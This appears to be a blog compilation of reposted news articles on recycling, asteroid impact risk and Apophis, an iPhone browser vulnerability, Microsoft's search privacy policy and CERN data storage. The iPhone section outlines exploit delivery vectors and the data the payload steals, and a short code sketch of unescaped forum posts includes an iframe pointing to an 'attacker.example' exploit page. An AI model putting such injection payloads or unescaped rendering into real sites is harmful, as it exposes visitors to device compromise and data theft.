Even so, plastics are being used more and more, not just for packaging, but also in consumer goods such as cars, televisions and personal computers. Because such products are made of a variety of materials and can contain multiple types of plastic, metals (some of them toxic), and glass, they are especially difficult and expensive to dismantle and recycle.
Europe and Japan have initiated “take back” laws that require electronics manufacturers to recycle their products. But in America only a handful of states have passed such legislation. That has caused problems for companies that specialise in recycling plastics from complex waste streams and depend on take-back laws for getting the necessary feedstock. Michael Biddle, the boss of MBA Polymers, says the lack of such laws is one of the reasons why his company operates only a pilot plant in America and has its main facilities in China and Austria.
Much recyclable material can be processed locally, but ever more is being shipped to developing nations, especially China. The country has a large appetite for raw materials and that includes scrap metals, waste paper and plastics, all of which can be cheaper than virgin materials. In most cases, these waste materials are recycled into consumer goods or packaging and returned to Europe and America via container ships. With its hunger for resources and the availability of cheap labour, China has become the largest importer of recyclable materials in the world.
The China question
But the practice of shipping recyclables to China is controversial. Especially in Britain, politicians have voiced the concern that some of those exports may end up in landfills. Many experts disagree. According to Pieter van Beukering, an economist who has studied the trade of waste paper to India and waste plastics to China: “as soon as somebody is paying for the material, you bet it will be recycled.”
In fact, Dr van Beukering argues that by importing waste materials, recycling firms in developing countries are able to build larger factories and achieve economies of scale, recycling materials more efficiently and at lower environmental cost. He has witnessed as much in India, he says, where dozens of inefficient, polluting paper mills near Mumbai were transformed into a smaller number of far more productive and environmentally friendly factories within a few years.
Still, compared with Western countries, factories in developing nations may be less tightly regulated, and the recycling industry is no exception. China especially has been plagued by countless illegal-waste imports, many of which are processed by poor migrants in China's coastal regions. They dismantle and recycle anything from plastic to electronic waste without any protection for themselves or the environment.
The Chinese government has banned such practices, but migrant workers have spawned a mobile cottage industry that is difficult to wipe out, says Aya Yoshida, a researcher at Japan's National Institute for Environmental Studies who has studied Chinese waste imports and recycling practices. Because this type of industry operates largely under the radar, it is difficult to assess its overall impact. But it is clear that processing plastic and electronic waste in a crude manner releases toxic chemicals, harming people and the environment—the opposite of what recycling is supposed to achieve.
Under pressure from environmental groups, such as the Silicon Valley Toxics Coalition, some computer-makers have established rules to ensure that their products are recycled in a responsible way. Hewlett-Packard has been a leader in this and even operates its own recycling factories in California and Tennessee. Dell, which was once criticised for using prison labour to recycle its machines, now takes back its old computers for no charge. And last month Steve Jobs detailed Apple's plans to eliminate the use of toxic substances in its products.
Far less controversial is the recycling of glass—except, that is, in places where there is no market for it. Britain, for example, is struggling with a mountain of green glass. It is the largest importer of wine in the world, bringing in more than 1 billion litres every year, much of it in green glass bottles. But with only a tiny wine industry of its own, there is little demand for the resulting glass. Instead what is needed is clear glass, which is turned into bottles for spirits, and often exported to other countries. As a result, says Andy Dawe, WRAP's glass-technology manager, Britain is in the “peculiar situation” of having more green glass than it has production capacity for.
Britain's bottle-makers already use as much recycled green glass as they can in their furnaces to produce new bottles. So some of the surplus glass is down-cycled into construction aggregates or sand for filtration systems. But WRAP's own analysis reveals that the energy savings for both appear to be “marginal or even disadvantageous”. Working with industry, WRAP has started a new programme called GlassRite Wine, in an effort to right the imbalance. Instead of being bottled at source, some wine is now imported in 24,000-litre containers and then bottled in Britain. This may dismay some wine connoisseurs, but it solves two problems, says Mr Dawe: it reduces the amount of green glass that is imported and puts what is imported to good use. It can also cut shipping costs by up to 40%.
The future of recycling
This is an unusual case, however. More generally, one of the biggest barriers to more efficient recycling is that most products were not designed with recycling in mind. Remedying this problem may require a complete rethinking of industrial processes, says William McDonough, an architect and the co-author of a book published in 2002 called “Cradle to Cradle: Remaking the Way We Make Things”. Along with Michael Braungart, his fellow author and a chemist, he lays out a vision for establishing “closed-loop” cycles where there is no waste. Recycling should be taken into account at the design stage, they argue, and all materials should either be able to return to the soil safely or be recycled indefinitely. This may sound like wishful thinking, but Mr McDonough has a good pedigree. Over the years he has worked with companies including Ford and Google.
An outgrowth of “Cradle to Cradle” is the Sustainable Packaging Coalition, a non-profit working group that has developed guidelines that look beyond the traditional benchmarks of packaging design to emphasise the use of renewable, recycled and non-toxic source materials, among other things. Founded in 2003 with just nine members, the group now boasts nearly 100 members, including Target, Starbucks and Estée Lauder, some of which have already begun to change the design of their packaging.
Sustainable packaging not only benefits the environment but can also cut costs. Last year Wal-Mart, the world's biggest retailer, announced that it wanted to reduce the amount of packaging it uses by 5% by 2013, which could save the company as much as $3.4 billion and reduce carbon-dioxide emissions by 667,000 tonnes. As well as trying to reduce the amount of packaging, Wal-Mart also wants to recycle more of it. Two years ago the company began to use an unusual process, called the “sandwich bale”, to collect waste material at its stores and distribution centres for recycling. It involves putting a layer of cardboard at the bottom of a rubbish compactor before filling it with waste material, and then putting another layer of cardboard on top. The compactor then produces a “sandwich” which is easier to handle and transport, says Jeff Ashby of Rocky Mountain Recycling, who invented the process for Wal-Mart. As well as avoiding disposal costs for materials it previously sent to landfill, the company now makes money by selling waste at market prices.
It does get recycled, honest (Image credit: EPA)

Evidently there is plenty of scope for further innovation in recycling. New ideas and approaches will be needed, since many communities and organisations have set high targets for recycling. Europe's packaging directive requires member states to recycle 60% of their glass and paper, 50% of metals and 22.5% of plastic packaging by the end of 2008. Earlier this year the European Parliament voted to increase recycling rates by 2020 to 50% of municipal waste and 70% of industrial waste. Recycling rates can be boosted by charging households and businesses more if they produce more rubbish, and by reducing the frequency of rubbish collections while increasing that of recycling collections.
Meanwhile a number of cities and firms (including Wal-Mart, Toyota and Nike) have adopted zero-waste targets. This may be unrealistic but Matt Hale, director of the office of solid waste at America's Environmental Protection Agency, says it is a worthy goal and can help companies think about better ways to manage materials. It forces people to look at the entire life-cycle of a product, says Dr Hale, and ask questions: Can you reduce the amount of material to begin with? Can you design the product to make recycling easier?
If done right, there is no doubt that recycling saves energy and raw materials, and reduces pollution. But as well as trying to recycle more, it is also important to try to recycle better. As technologies and materials evolve, there is room for improvement and cause for optimism. In the end, says Ms Krebs, “waste is really a design flaw.”

The ultimate environmental catastrophe: the threat from outer space




99942 Apophis







ONE of the main weaknesses of the environmental movement has been its unfortunate predilection for using doom-laden language and catastrophic superlatives to describe problems that are serious but not immediately disastrous. But one calamity that truly deserves such a description is almost never talked about. There are tens of millions of asteroids in the solar system, and several thousand move in orbits that take them close to Earth. Sooner or later, one of them is going to hit it.

Several have done so in the past. Earth's active surface and enthusiastic weather conspire to scrub the tell-tale impact craters from the planet's surface relatively quickly, but the pockmarked surface of the moon, where such scars endure for much longer, testifies to the amount of rubble floating in the solar system. Earth's thick atmosphere makes it better protected than the moon: asteroids smaller than about 35 metres (115 feet) across will burn up before hitting its surface. Nevertheless, plenty of craters exist. The Earth Impact Database in Canada lists more than 170.



Fortunately, such impacts are relatively rare, at least on human timescales. Statisticians calculate that the risks to lives and property posed by meteorite strikes are roughly comparable with those posed by earthquakes.




Although the chance of an impact may be small in any given year, the consequences could be enormous. The effect of an impact depends on an object's size and speed. A meteorite a few tens of metres wide could level a city. The largest (a kilometre or more in diameter) could wreak ecological havoc across the entire globe. David Morrison, a NASA scientist, argued at a recent conference that a large meteorite strike is the only known disaster (except perhaps global nuclear war) that could put civilisation at risk.
Examples give a more visceral illustration than statistics. The Chicxulub crater, buried beneath modern Mexico, is 65m years old and 180km (112 miles) across. Some think that the ten-kilometre meteorite that created it threw so much dust into the atmosphere that it blotted out the sun and led to the extinction of the dinosaurs. In 1908 a comparatively tiny piece of space-borne rock, 30-50 metres across, exploded above Tunguska, a remote part of Siberia. The blast, hundreds of times more powerful than the atom bomb dropped on Hiroshima 37 years later, felled 80m trees over 2,150 square kilometres. Only blind luck ensured that it took place in a relatively unpopulated part of the world. Astronomers are currently trying to work out whether a 270-metre asteroid named 99942 Apophis will hit Earth in 2036 (probably not, but it would be nice to be sure).
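A rough calculation shows why size matters so much. The density and entry speed below are assumptions of mine, not figures from the article:

# Back-of-the-envelope impact energies (assumed rocky density of 3000 kg/m^3
# and entry speed of 17 km/s; purely illustrative).
import math

MT_TNT_J = 4.184e15          # joules per megaton of TNT

def impact_energy_mt(diameter_m, density_kg_m3=3000.0, speed_m_s=17_000.0):
    radius = diameter_m / 2
    mass = density_kg_m3 * (4 / 3) * math.pi * radius**3
    return 0.5 * mass * speed_m_s**2 / MT_TNT_J

for d in (40, 270, 1000):    # ~Tunguska-sized, ~Apophis-sized, "civilisation" class
    print(f"{d:5d} m object: roughly {impact_energy_mt(d):,.0f} Mt of TNT")
# A ~40 m object already releases a few megatons -- hundreds of Hiroshima bombs --
# while a kilometre-wide one reaches tens of thousands of megatons.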




Happily for humanity, technology has advanced to the point where it is possible, in principle, to avoid such a collision. In 1998 NASA agreed to try to find and catalogue, by 2008, 90% of those asteroids bigger than 1km in diameter that might pose a threat to Earth. Any deemed dangerous would have to be pushed into a safer orbit. One obvious way to do this is with nuclear weapons, a method that has the pleasing symmetry of using one potential catastrophe to avert another. But scientists counsel caution. A nuclear blast could simply split one large asteroid into several smaller ones, some of which could still be on a collision course.




Other plans have been suggested. One is to use a high-speed spaceship simply to ram the asteroid out of the way; another is to land a craft on the rock's surface and use its engines to manoeuvre the asteroid to safety. A subtler method is to park a spaceship nearby and use its tiny gravity to pull the asteroid gradually off course. For now, all such suggestions are theoretical, although the European Space Agency is planning a mission, named Don Quijote, to test the ramming tactic in 2011.




These schemes offer consolation, but any effort to deflect an asteroid requires plenty of advance warning, and that may not always be available. NASA has so far catalogued only the very largest, "civilisation-killing" asteroids. Plenty of smaller ones remain undiscovered, and they could inflict considerable damage. In 2002 a mid-sized asteroid (50-120 metres across) missed Earth by 121,000 km, one-third of the distance to the moon. Astronomers discovered it three days after the event. Comets, which originate from the outer reaches of the solar system, are faster moving and harder to track than asteroids, but carry just as much potential for catastrophe.




But perhaps the biggest problem is humanity's indifference. Currently only America is spending any money on detection, and even there, politicians have other priorities. Much of the work is done by Cornell University's Arecibo radar in Puerto Rico, which is facing federal funding cuts. The telescope costs roughly $1m a year to operate. As an insurance policy for civilisation, the price looks cheap.





Inside News: 99942 Apophis





Apophis belongs to a group called the "Aten asteroids", asteroids with an orbital semi-major axis less than one astronomical unit. This particular one has an orbital period about the Sun of 323 days, and its path brings it across Earth's orbit twice on each passage around the Sun.
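That classification can be sanity-checked from the period alone using Kepler's third law (a quick check of my own, not from the source):

# Kepler's third law, a^3 = P^2 with a in AU and P in years, applied to
# Apophis's 323-day period.
period_years = 323 / 365.25
semi_major_axis_au = period_years ** (2 / 3)

print(f"Orbital period:  {period_years:.3f} yr")
print(f"Semi-major axis: {semi_major_axis_au:.3f} AU")
# ~0.92 AU, i.e. less than one astronomical unit, which is exactly what places
# Apophis in the Aten group of near-Earth asteroids.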




Based upon the observed brightness, Apophis's diameter was estimated at 415 m (1350 ft); a more refined estimate based on spectroscopic observations at NASA's Infrared Telescope Facility in Hawaii by Binzel, Rivkin, Bus, and Tokunaga (2005) is 350 m (1150 ft). Its mass is estimated to be 4.6×10^10 kg.




As of February 2005, the prediction is that during its close approach in 2029 the asteroid will pass just below the altitude of geosynchronous satellites, which are at 35,786 km (22,300 mi). Apophis's brightness will peak at magnitude 3.3, with a maximum angular speed of 42° per hour. Such a close approach by an asteroid of this size is expected to occur only every 1,300 years or so. The maximum apparent angular diameter will be ~2 arcseconds, which means it will be a starlike point of light in all but the very largest telescopes.





Discovery
Apophis was discovered on June 19, 2004, by Roy A. Tucker, David J. Tholen, and Fabrizio Bernardi of the NASA-funded University of Hawaii Asteroid Survey from Kitt Peak National Observatory in Arizona. This group observed for two nights. The new object received the provisional designation 2004 MN4.




On December 18, 2004, the object was rediscovered from Australia by Gordon Garradd of the Siding Spring Survey, another NASA-funded NEA survey. Further observations from around the globe over the next several days allowed the Minor Planet Center to confirm the connection to the June discovery.





Naming
When first discovered, the object received the provisional designation 2004 MN4 (sometimes written with a subscript, as 2004 MN₄), and news and scientific articles about it referred to it by that name. When its orbit was sufficiently well calculated it received the permanent number 99942 (on June 24, 2005), the first numbered asteroid with Earth-impact solutions (to its orbit determination from observations). Receiving a permanent number made it eligible for naming, and it promptly received the name "Apophis" as of July 19, 2005. Apophis is the Greek name of the Ancient Egyptian god Apep, "the Destroyer", who dwells in the eternal darkness of the Duat (underworld) and tries to destroy the Sun during its nightly passage.




Although the Greek name for the Egyptian god may be appropriate, Tholen and Tucker (two of the co-discoverers of the asteroid) are reportedly fans of the TV series Stargate SG-1. The show's main antagonist in the first several seasons was an alien named Apophis who took his name from the Egyptian god and sought to destroy Earth[2].








More:
http://neo.jpl.nasa.gov/risk/a99942.html







Security flaw found in iPhone


A team of independent security experts has found a flaw in the Apple iPhone that allows hackers to take control of the device, the New York Times reported today.
The researchers at Independent Security Evaluators, which tests the security of devices by hacking them, found that the iPhone's Wi-Fi connectivity allowed them to take control of the device and mine the wealth of private information the phones contain. The researchers also said they could redirect users to a malicious Web site that could likewise circumvent the security on the phone.
The story quotes Lynn Fox, spokeswoman for Apple, saying, "Apple takes security very seriously and has a great track record of addressing potential vulnerabilities before they can affect users."




Welcome iPhone
Shortly after the iPhone was released, a group of security researchers at Independent Security Evaluators decided to investigate how hard it would be for a remote adversary to compromise the private information stored on the device. Within two weeks of part-time work, we had successfully discovered a vulnerability, developed a toolchain for working with the iPhone's architecture (which also includes some tools from the #iphone-dev community), and created a proof-of-concept exploit capable of delivering files from the user's iPhone to a remote attacker. We have notified Apple of the vulnerability and proposed a patch. Apple is currently looking into it.
A member of our team, Dr. Charlie Miller, will be presenting the full details of discovering the vulnerability and creating the exploit at BlackHat on August 2nd. This site will be updated to reflect those details at that time; until then, we have decided only to release general information about exploiting the iPhone.
How the exploit works

The exploit is delivered via a malicious web page opened in the Safari browser on the iPhone. There are several delivery vectors that an attacker might utilize to get a victim to open such a web page. For example:
An attacker controlled wireless access point: Because the iPhone learns access points by name (SSID), if a user ever gets near an attacker-controlled access point with the same name (and encryption type) as an access point previously trusted by the user, the iPhone will automatically use the malicious access point. This allows the attacker to add the exploit to any web page browsed by the user by replacing the requested page with a page containing the exploit.
A misconfigured forum website: If a web forum's software is not configured to prevent users from including potentially dangerous data in their posts, an attacker could cause the exploit to run in any iPhone browser that viewed the thread. (This would require some slight changes in our proof of concept exploit, however.)
A link delivered via e-mail or SMS: If an attacker can trick a user into opening a website that the attacker controls, the attacker can easily embed the exploit into the main page of the website.
When the iPhone's version of Safari opens the malicious web page, arbitrary code embedded in the exploit is run with administrative privileges. In our proof of concept, this code reads the log of SMS messages, the address book, the call history, and the voicemail data. It then transmits all this information to the attacker. However, this code could be replaced with code that does anything that the iPhone can do. It could send the user's mail passwords to the attacker, send text messages that sign the user up for pay services, or record audio that could be relayed to the attacker.
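The forum vector above hinges on user-supplied post content reaching visitors' browsers unescaped. The sketch below is a generic, hypothetical illustration of that mechanism, not the researchers' exploit; the function name, markup and URL are invented for the example:

import html

def render_post(body: str, escape: bool = True) -> str:
    # With escape=True, user-supplied markup is neutralised; with escape=False
    # (the misconfiguration described above), whatever the poster wrote, e.g.
    # an iframe pointing at attacker-controlled content, is served verbatim to
    # every visitor's browser.
    content = html.escape(body) if escape else body
    return f"<div class='post'>{content}</div>"

post = '<iframe src="http://attacker.example/exploit"></iframe>'
print(render_post(post, escape=True))   # rendered as harmless text
print(render_post(post, escape=False))  # injected into the page as-is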

Microsoft moves to protect consumer privacy in web search


MICROSOFT is moving to protect consumer privacy in web search and advertising and has called on the internet industry to support it.
Microsoft said it was responding to public concern over the recent consolidation of the online ad industry as well as stepped-up interest from government regulators in its call for a comprehensive rather than piecemeal approach to privacy.
"We think it's time for an industry-wide dialogue," Peter Cullen, Microsoft's chief privacy officer, said in an interview. "The current patchwork of protections and how companies explain them is really confusing to consumers."
Specifically, Microsoft said it would make all web search query data anonymous after 18 months on its "Live Search" service, unless it receives user consent to store it longer. The policy changes are retroactive and worldwide, it said.
Microsoft planned to store customer search data separately from data tied to people, email addresses or phone numbers, and to take steps to ensure no unauthorised correlation of these types of data could be made. It would also permanently remove "cookie" user-identification data, web addresses, and other identifiers.
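As a rough sketch of what such a retention rule could look like in code (the field names, record layout and 18-month cut-off handling are illustrative assumptions, not Microsoft's implementation):

from datetime import datetime, timedelta

RETENTION = timedelta(days=18 * 30)   # roughly 18 months

def anonymise(record: dict, now: datetime) -> dict:
    # Strip identifying fields from search-log records older than the window.
    if now - record["timestamp"] > RETENTION:
        scrubbed = dict(record)
        for field in ("ip_address", "cookie_id", "user_id"):
            scrubbed.pop(field, None)
        return scrubbed
    return record

old = {"timestamp": datetime(2005, 7, 1), "query": "weather", "ip_address": "10.0.0.1"}
print(anonymise(old, datetime(2007, 7, 31)))   # identifiers removed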
"Microsoft is going to do a more thorough scrub of customer data once it is too old," said Peter Swire, a law professor at Ohio State University who served as US privacy czar in the 1990s. "Previously, the practice was to do a partial scrub."
As part of Microsoft's push, Ask.com, the web search business of Barry Diller's IAC/InterActiveCorp, has agreed to join Microsoft in calling on the industry to adopt a common set of privacy practices for data collection, commercial use and consumer protection in search and online advertising. Last week, it unveiled AskEraser, a service that will allow Ask customers to change their privacy preferences at any time.
Microsoft's initiatives follow recent moves by Google, the dominant provider of web searches and the company most under fire by privacy advocates concerned at how rapid advances in search technology may pose unprecedented threats to consumer privacy.
Google set in motion industry efforts to limit how long web search data is stored by being the first to say it would cleanse personal information from its databases after 18 months. Microsoft is one-upping Google by making its move retroactive.
Google has stepped up its own efforts to reach compromises with European Union and US policy-makers in recent months.
Microsoft said it was taking new steps to notify users how technologies affected them, giving users more specific controls over their privacy and setting tighter limits on how long it kept search data. It will also minimise the amount of data it collects via its "Live Search" and online advertisement targeting services.
"Search, itself, is a relatively new business and advertising-supported search, and the issues it raises, are also relatively new," Mr Cullen said. "You have almost a collision of these two things."
Both Google and Microsoft have faced scrutiny from US and European regulators over their plans to merge with major players in the online advertising industry.
Google is seeking approval to buy advertising services firm DoubleClick for $US3.1 billion ($3.5 billion), a move analysts said would more than double the number of web users to whom it serves up online ads. Similarly, Microsoft plans to buy diversified ad services company aQuantive, a DoubleClick rival, for $US6 billion. A shareholder meeting to approve the deal is set for August.
The DoubleClick deal, in particular, faces congressional hearings over the potential privacy issues that could arise from the concentration of data about consumer web-surfing habits, buying behaviour and advertising data.
Forrester privacy analyst Jennifer Albornoz Mulligan said the internet industry was feeling the heat from customers who were confused by the many conflicting state and federal privacy policies across banking, retail, advertising and elsewhere.
Most consumers had given up reading the detailed privacy notices contained in footnotes on websites because everyone knew that "you can adopt privacy principles without really doing a great job of protecting privacy", Ms Mulligan said.
Mr Cullen said Microsoft did not believe a one-size-fits-all approach to online privacy could work. It wanted consumers who sought anonymity online to have the power to achieve it, while giving customers who prized convenience over anonymity access to a new class of personalised services that depend on user data.
"People want a high degree of personalisation, but they don't want to feel like they are being surveilled," he said


Back Story of Peter Cullen


REDMOND, Wash., June 23, 2003 — Microsoft Corp. today announced that Peter Cullen, a recognized privacy leader and current corporate privacy officer for Royal Bank of Canada (RBC), is joining the company as chief privacy strategist.
Cullen, who will join Microsoft on July 14, brings more than a decade of experience in privacy and data protection work to Microsoft's Trustworthy Computing initiative. Cullen will report to Scott Charney, chief Trustworthy Computing strategist, working closely with him to help ensure that privacy protections and best practices are incorporated into all Microsoft® products, services, systems and internal processes.
"Peter Cullen has the experience to drive Microsoft's commitment to privacy protections to the next level. With his deep background in privacy and data protection practices and their relationship to customer value, Peter will be an effective advocate for strong and innovative consumer privacy safeguards," Charney said. "We look forward to having Peter apply his experiences and skills to benefit Microsoft's customers and partners through the privacy pillar of our Trustworthy Computing initiative."
Cullen is widely recognized as a pioneer in privacy and helped develop the financial industry's best practices around the collection and use of information. His work resulted in Royal Bank of Canada (RBC) establishing important competitive differentiation that remains an example to several industries.
While at RBC, Cullen established the Corporate Privacy Group and its practices, a first for a Canadian financial institution. He also implemented an integrated privacy management/compliance structure for U.S. operations, which included six affiliate companies. As a result, Cullen helped RBC become recognized as a North American leader in the area of privacy management.
Microsoft's Trustworthy Computing initiative reflects the company's belief that technology must truly be trustworthy if it is ever to realize its full potential to enhance people's lives. Microsoft's Trustworthy Computing effort is focused on four key pillars: security, privacy, reliability and business integrity.
• Security means ensuring that one's information and data are safe.
• Privacy means placing people in control of their personal information as well as respecting their right to be left alone.
• Reliability means ensuring that technology works every time people need it.
• Business integrity means being clear, open, fair, respectful and responsive to customers and the public.
Cullen said he decided to join Microsoft because of its commitment to driving privacy protections and programs within the company and throughout its industry.
"I look forward to joining Microsoft to help the company deliver on its vision of trustworthy computing," Cullen said. "Microsoft has placed a priority on privacy, and I look forward to applying my experience in developing innovative privacy practices and programs to deliver high-quality technologies and services to our customers and partners."
Cullen holds an MBA from Richard Ivey School of Business at the University of Western Ontario. He is a founding member of two networks of chief privacy officers and is an active public speaker.

Sunday, July 22, 2007

Search for God Particles Drives Massive Storage Effort: CERN believes the LHC will let scientists re-create how the universe behaved immediately after the Big Bang


CERN (the European Organization for Nuclear Research) and its massive particle accelerators feature in Angels & Demons by Dan Brown, of The Da Vinci Code fame. In that book, the lead character travels to the cavernous research institute on the border of France and Switzerland to help investigate a murder. In real life, one of CERN's grisliest problems is finding storage for the massive amounts of data derived from its four high-profile physics experiments making use of the institute's Large Hadron Collider (LHC). Due for operation in May 2008, the LHC is a 27-kilometer-long device designed to accelerate subatomic particles to ridiculous speeds, smash them into each other and then record the results.



The LHC experiments will study everything from the tiniest forms of matter to the questions surrounding the Big Bang. The latter subject provided Pierre Vande Vyvre, a project leader for data acquisition for CERN, with a particularly thorny challenge: He had to design a storage system for one of the four experiments, ALICE (A Large Ion Collider Experiment). It's one of the biggest physics experiments of our time, boasting a team of more than 1,000 scientists from around the world.


For one month per year, the LHC will be spitting out project data to the ALICE team at a rate of 1 GB per second. That's 1 GB per second, for a full month, "day and night," Vande Vyvre says. During that month, the data rate is an entire order of magnitude larger than that of each of the other three experiments being done with the LHC. In total, the four experiments will generate petabytes of data.

CERN believes that the LHC will let scientists re-create how the universe behaved immediately after the Big Bang. At that time, everything was a "sort of hot dense soup...composed of elementary particles," the project's webpage explains. The LHC can trigger "little bangs" that let ALICE scientists study how the particles act and come together, helping answer questions about the actual structure of atoms.
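A back-of-the-envelope check of what a month at that rate adds up to (assuming 1 GB = 10⁹ bytes and a 30-day month; the figures are illustrative):

rate_bytes_per_s = 1e9
seconds_per_month = 30 * 24 * 3600
print(f"{rate_bytes_per_s * seconds_per_month / 1e15:.1f} PB")   # ≈ 2.6 PB for ALICE alone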

"The data is what the whole experiment is producing," Vande Vyvre says. "This is the most precious thing we have.”Vande Vyvre is charged with managing the PCs, storage equipment, and custom and homegrown software surrounding the ALICE project's data before it hits the data center and gets archived. The ALICE group's experiments will start running in May 2008, but the storage rollout began in September 2006.

The ALICE experiment grabs its data from 500 optical fiber links and feeds data about the collisions to 200 PCs, which start to piece the many snippets of data together into a more coherent picture. Next, the data travels to another 50 PCs that do more work putting the picture together, then record the data to disk near the experiment site, which is about 10 miles away from the data center. "During this one month, we need a huge disk buffer," Vande Vyvre says.


" News Inside News,The European Organization for Nuclear Research (French: Organisation européenne pour la recherche nucléaire), commonly known as CERN (see Naming), pronounced [sɝn] (or [sɛʀn] in French), is the world's largest particle physics laboratory, situated just northwest of Geneva on the border between France and Switzerland. The convention establishing CERN was signed on 29 September 1954. From the original 12 signatories of the CERN convention, membership has grown to the present 20 member states. Its main function is to provide the particle accelerators and other infrastructure needed for high-energy physics research. Numerous experiments have been constructed at CERN by international collaborations to make use of them.